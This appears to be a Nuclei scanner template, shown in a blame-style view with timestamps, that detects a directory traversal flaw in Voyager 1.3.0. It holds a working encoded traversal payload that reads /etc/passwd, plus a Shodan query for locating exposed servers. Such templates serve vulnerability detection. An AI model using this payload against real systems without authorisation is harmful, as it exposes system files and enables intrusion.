2024-03-31 17:41:43 +00:00
|
|
|
id: voyager-lfi
|
2024-03-31 11:14:49 +00:00
|
|
|
|
|
|
|
info:
|
2024-03-31 17:41:43 +00:00
|
|
|
name: Voyager 1.3.0 - Directory Traversal
|
2024-03-31 11:14:49 +00:00
|
|
|
author: mammad_rahimzada
|
|
|
|
severity: high
|
2024-03-31 17:41:43 +00:00
|
|
|
description: |
|
|
|
|
Voyager 1.3.0 is vulnerable to local file inclusion.
|
2024-03-31 11:14:49 +00:00
|
|
|
reference:
|
2024-03-31 17:41:43 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47875
|
2024-03-31 11:14:49 +00:00
|
|
|
classification:
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2024-03-31 17:41:43 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
shodan-query: html:"voyager-assets"
|
|
|
|
tags: voyager,lfi
|
2024-03-31 11:14:49 +00:00
|
|
|
|
2024-03-31 17:41:43 +00:00
|
|
|
http:
|
2024-03-31 11:14:49 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2024-03-31 17:41:43 +00:00
|
|
|
part: body
|
2024-03-31 11:14:49 +00:00
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
2024-03-31 17:41:43 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/plain"
|
2024-03-31 11:14:49 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-04-04 07:29:37 +00:00
|
|
|
# digest: 4b0a00483046022100c63eefb35a033aa410140b8eb0a820269dd7636f950a8aae7994097a70e80d4c022100eb475dc522e4fb6af94961188a91347ecab596501025105354698b295c16e85d:922c64590222798bb761d5b6d8e72950
|